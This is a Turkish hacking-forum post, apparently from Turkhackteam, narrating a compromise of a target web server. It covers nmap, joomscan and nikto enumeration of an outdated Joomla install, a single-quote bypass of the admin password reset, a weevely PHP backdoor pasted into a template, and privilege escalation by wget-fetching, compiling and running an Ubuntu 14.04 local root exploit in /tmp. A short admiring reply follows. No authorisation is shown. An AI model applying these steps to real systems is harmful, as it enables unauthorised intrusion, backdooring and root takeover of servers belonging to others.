Uygulamalı PENTEST Hikayesi+Server ROOT !

Misafir

Üye
10 Ara 2015
193
0
Selamun Aleykum,

Arkadaşlar hedef site üzerinde yaptığımız sızma girişimlerinin uygulamalarını gösterdim.

Öncelikle sistem default olarak hedef.com:80 diye giriş yapıyordu siteye.

80. portta çalışan Apache httpd servisinde, basit bir html sayfa vardı.

1LaaQ1.png


Burdan sızmamız mümkün değildi, zaten büyük bir sistem de bundan ibaret olamaz diyip başka port’ta çalışan apache servisi var mı diye nmap’le bir tarama gerçekleştirdim.

Tarama sonrası 8080/tcp & 8081/tcp portlarında çalıştığını gördüm.

Ly88VJ.png


8080/tcp portuna giriğimde apache tomcat servisinin direktif sayfası çıktı burdan da giriş zor gibi görünüyordu.

8081/tcp portuna girdiğimde ise Joomla kurulu hazır bir sistem karşıma çıktı.

r3XXPB.png


Görünüşe göre eski sürümdü, yapacağım ilk şey Kali’de kurulu gelen Joomscan adlı tool ile hedef sistemi taramak oldu.


gqvvmL.png

Ardından paneli ve robots.txt dosyasını, dizinleri, sistem hakkında detaylı bilgiyi toplamak için Nikto adlı tool ile taradım.

7qWWRm.png


/administrator dizini dikkatimi çekti burada.

Zaten o dizinin içinde index.php adlı dosyayı gördükten sonra panelin bu olduğu kanaatine vardı tool :)

P022Xv.png


Joomscan ile yaptığım tarama sonuçlandı, listede Vulnerable ? Yes olan birçok fonksiyon vardı.

Bunlar arasından beni uğraştırmadan direkt olarak hedefe ulaştıracak vuln. hangisi diye göz gezdirirken admin şifresini sıfırlama adlı bir başlık dikkatimi çekti.

Açığın var olup olmadığına baktığımda Vulnerable? Yes yazıyordu, zaten exploit edilişinin nasıl olacağı hk. direktifleri veriyordu bize.



Açıklamak gerekirse, verdiği url’ye gittiğimizde token girmemiz için verilen bi textarea’yla karşılaşıyorduk. Bunun yerine ’ (tek tırnak) girince admin şifresini sıfırlamak için hazırlanmış panel karşımızda beliriyordu.



ojqqB2.png


İki kutucuğa da aynı passwd’i girip Submit butonuna bastıktan sonra;
ldPPnk.png

Şifreniz başarıyla sıfırlandı diye bir bildiri mesajı geliyordu karşımıza.



Hatırlarsanız Nikto ile yaptığımız tarama sonucunda panelin /administrator dizininde olduğunu söylemişti.

Şifremizi girip panele giriyoruz ve edit / upload kısmı arıyoruz sisteme dosya yedirebilmek için.

Template manager kısmına geliyoruz.


brZZqd.png

Kullanılan şablonu seçiyoruz ve sağ üstteki edit html’e tıklıyoruz.



Verilen path’teki dosyanın source kodları karşımızda, onları silip shell’inizin kodlarını yapıştırabilirsiniz.

Ben weevely’le oluşturduğum PHP Backdoor’un kodlarını yapıştırıyorum.


dPllQV.png

Ardından bc olup sistemde kod çalıştırabilecek miyiz diye bakıyoruz. Evet çalışıyor.

5gEEPj.png


Ama bizi üzen bir nokta var, www-data kullanıcısıyız. Sistemde herhangi bi yetkiye sahip değiliz.
AL884p.png

Uname -a diyip sistem hk. geniş bilgi elde ediyoruz. ’ Ubuntu 14.04 local root exploit ’ diye google’da aratıyoruz.


01WWv9.png



Exploit’i bulup uzaktaki host’a upl. ettim.
X08No5.png



Ardından tam yetkili geçici dizin olan /tmp dizinine geldim.

wget exp._adresi/exploit.c -> exploiti sisteme çağırdım.

saved (kaydedildi) dedi. ls diyip listelediğimde ise burda olduğunu gördüm.

Ja88Ro.png


gcc exploit.c -o exp._yenismi -> derledik.

chmod 777 exp._yenismi -> yetkilendirdik.

./exp._yenismi -> çalıştırdık.


O088YQ.png

Burda dikkatimizi tek çeken şey ise :’( üzgün ifade oldu :D su (sudo’dan hatırlayacaksınız) id (kimlik) ’ oluşturulamadı diyor.

Konuyu hazırlamadan önce tüm işlemleri deneme amaçlı gerçekleştirirken root da oldum.
 

AquieLL

Kıdemli Üye
1 Tem 2014
4,034
16
aquu.php
zaten Nmap mükemmel bir araç daha sonrasında doğru yolu seçerek iyi bir yol izlemişmiş tebrik ediyorum mükemmel :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.